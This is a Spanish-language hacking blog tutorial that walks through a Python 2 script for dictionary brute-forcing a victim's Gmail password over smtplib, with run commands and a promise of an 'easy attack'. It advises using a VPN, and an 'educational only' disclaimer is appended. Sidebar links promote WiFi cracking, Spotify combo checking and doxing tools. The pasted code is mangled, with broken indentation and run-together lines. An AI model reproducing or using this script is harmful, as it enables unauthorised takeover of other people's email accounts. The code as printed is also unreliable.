-¿Te unes?- ㊜Suscribete!!!

Ataque de fuerza bruta a gmail con python


Ataque de fuerza bruta
Este método se trata de prueba y error, donde el atacante, provisto con algún software automatizado, puede probar miles de combinaciones posibles de diferentes caracteres y longitudes para tratar de abrir la autenticación del usuario, hasta que da con la contraseña correcta.

Ataque por diccionario
Es una variante del ataque de fuerza bruta, con la diferencia de que no prueba miles de combinaciones al azar ni siguiendo cierto patrón, sino que prueba palabras extraídas previamente de un diccionario, y testea también combinaciones de las mismas.

Vamos a repasar un poco sobre las conexiones que tiene gmail.
server: smtp.gmail.com


port: 465
port: 587 

Ahora vamos a escribir nuestro comando para eso tenemos que tener instalado Python en nuestra maquina vamos a usar la librería "smtplib"

Que es  smtplib?
Es una librería estándar de Python, quien nos permitirá enviar mensajes de correo electrónico, incluso, en formato HTML.
Ahora vamos a colocar los servidores de gmail para la conexión.
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)smtpserver.ehlo()smtpserver.starttls() 

Lo que vemos es la conexión al server con su puerto detallado.
En el siguiente paso vamos a colocar para el usuario ingrese el correo de la victima y coloque el diccionario.
user = raw_input("Ingresa el correo de tu victima: ")passwfile = raw_input("El archivo del diccionario: ")passwfile = open(passwfile, "r")

Como vemos que user se encargará como el usuario de la victima y con la siguiente orden seria la ubicación del diccionario. En el código vemos que en la misma carpeta o ubicada el mismo programa en python agarrará el diccionario.
Después de haber colocado los mensaje ahora vamos a colocar las ordenes que hará nuestro programa en python.

for password in passwfile:
        try:
smtpserver.login(user, password)
 print "[+] Password Found: %s" % password                
break;        
except smtplib.SMTPAuthenticationError:               
 print "[!] Password Incorrect: %s" % password 

De la contraseña lo buscara en un archivo en el cual se conectará al servidor indicado y te mostrará los mensajes si es correcto o es incorrecto.
Muy simple código y fácil de usar.
Si quieres el código completo puedes encontrarlo aquí.
Ahora solo vamos a guardarlo y darle privilegios.
chmod 775 gmail.py chmod +x gmail.py RUN python gmail.py



Listo ahora con tu diccionario puedes hacer tu ataque fácil.
Antes de aclarar si tu cuenta esta protegida puedes pinchar aquí para ver si esta segura o esta desprotegida.

  • Al estar segura el ataque será bloqueado.
  • Te olvides en usar un VPN para mayor seguridad.
  • No olvides en compartirlo y apoyar este proyecto de programación.
Requisitos
  • Sistema operativos linux,windows ,termux.
  • Instalar python
  • Editor de texto notepad++ "opcional" otros

Ejecutamos el programa o script 

Ingresamos el correo de la victima para qe pueda hacer fuerza bruta.

psw.txt es el nombre de nuestro diccionario que crearemos.

Veremos que en cuanto hacemos fuerza bruta, gmail notifica al usuario que alguien ingreso a su cuenta pero la fuerza bruta es usado hoy en día como modo de recuperación de cuentas olvidadas.

Esta siendo scanea las contraseña y va verificando cual es la correcta.
Ingresamos al login para verificar nuestra cuenta de gmail



Ingresamos los datos de la cuenta
Iniciamos sección









Vídeo usando python


Vídeo usando el ejecutable

Donación paypal
ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL.
PERMANECE LEGAL. GRACIAS!
Si tienes algún problema, deja un comentario.

Comentarios

Entradas populares de este blog

Instalar DoxWeb con Termux

Termux Instalar Ngrok

Termux buscar con userRecon redes sociales de un persona

banner logo

📽video

Únete al chat

Comentarios

Blog Populares

Instalar DoxWeb con Termux

Instalar Metasploit-Framework En Android Con Termux

Termux Instalar Ngrok

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

Generar combos+verificar cuentas para spotify

👻 By Blog

By Luishiño

Security

Compartir el Link

Copiar

Estamos en constante crecimiento


× IMPORTANTE!

»El autor de este blog tiene como objetivo principal facilitar el acceso a información

sobre seguridad informática, tecnología, programación, técnicas de hacking e inteligencia artificial.

Es importante destacar que el blog está destinado exclusivamente a fines educativos y NO promueve actividades ilegales.

El autor se desliga de cualquier responsabilidad sobre descargas, opiniones y comentarios de los textos que se citen en el blog.

La misión principal es compartir conocimiento responsable para mejorar la seguridad digital y promover el uso ético de la tecnología.

Se hace un llamado a los lectores para utilizar sus habilidades de manera responsable y nunca para dañar a otros.

Descarga gratis la app The Seven Codes y comparte con tus amig@s

Google play

Esta obra de Luishiño está bajo una Licencia Creative Commons Atribución-NoComercial-CompartirIgual CC BY-NC-SA 4.0 Internacional

Aviso Legal


>_Si te gustan los contenidos de este sitio,
¿Deseas realizar una aportación?
Puedes colaborar con una pequeña donación via PayPal. La forma rápida y segura de pagar en Internet. シ

Apoyar al sitio


📡Los interesados en información sobre contrato de soporte Asistencia Técnica , licencia de uso/actualizaciones de sus utilidades, contacten con The Seven Codes para hacer su presupuesto y/o consultar por el servicio al twitter:@Lpericena

Mis redes sociales

© Copyright 2020-2024 .Todos los derechos reservados
by Luishiño - The Seven Codes